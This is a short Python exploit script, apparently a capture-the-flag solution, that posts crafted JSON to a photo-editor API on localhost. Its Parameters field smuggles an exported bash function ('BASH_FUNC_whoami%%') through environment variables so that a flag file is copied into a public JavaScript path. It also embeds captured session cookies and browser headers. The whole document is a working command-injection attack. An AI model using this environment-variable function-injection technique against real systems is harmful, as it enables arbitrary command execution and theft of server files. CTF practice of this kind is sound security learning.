1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
|
#!/usr/bin/env python3
from base64 import b64decode
import requests
import sys
cookies = {
'_streamlit_xsrf': '2|9690aa7c|65f1b6483b23d4f268aaa1bc37107645|1713379145',
'ajs_anonymous_id': '41f17fef-5f83-4be5-a144-1bcfd22fd984',
}
headers = {
'Accept': 'application/json, text/javascript, */*; q=0.01',
'Accept-Language': 'en-US,en;q=0.9',
'Cache-Control': 'no-cache',
'Connection': 'keep-alive',
'Content-Type': 'application/json',
'Origin': 'http://localhost:1024',
'Pragma': 'no-cache',
'Referer': 'http://localhost:1024/',
'Sec-Fetch-Dest': 'empty',
'Sec-Fetch-Mode': 'cors',
'Sec-Fetch-Site': 'same-origin',
'Sec-GPC': '1',
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36',
'X-Requested-With': 'XMLHttpRequest',
'sec-ch-ua': '"Brave";v="123", "Not:A-Brand";v="8", "Chromium";v="123"',
'sec-ch-ua-mobile': '?0',
'sec-ch-ua-platform': '"Linux"',
}
json_data = {
'Base64Blob': open("b64").read().strip(),
'DynamicAction': 'GetUsername',
'Parameters': '[{"PATH": "/usr/bin", "BASH_FUNC_whoami%%": "() { cat /App/flag > /App/wwwroot/js/flag.js; }"}]',
'Types': ["System.Collections.Generic.Dictionary`2[System.String,System.String]"],
}
baseurl = sys.argv[1] if len(sys.argv) > 1 else "http://localhost:1024"
response = requests.post(
f'{baseurl}/api/DynamicPhotoEditor/EditImage',
cookies=cookies,
headers=headers,
json=json_data,
)
print(response.status_code)
print(response.text)
print(b64decode(response.json()["base64Blob"]))
|
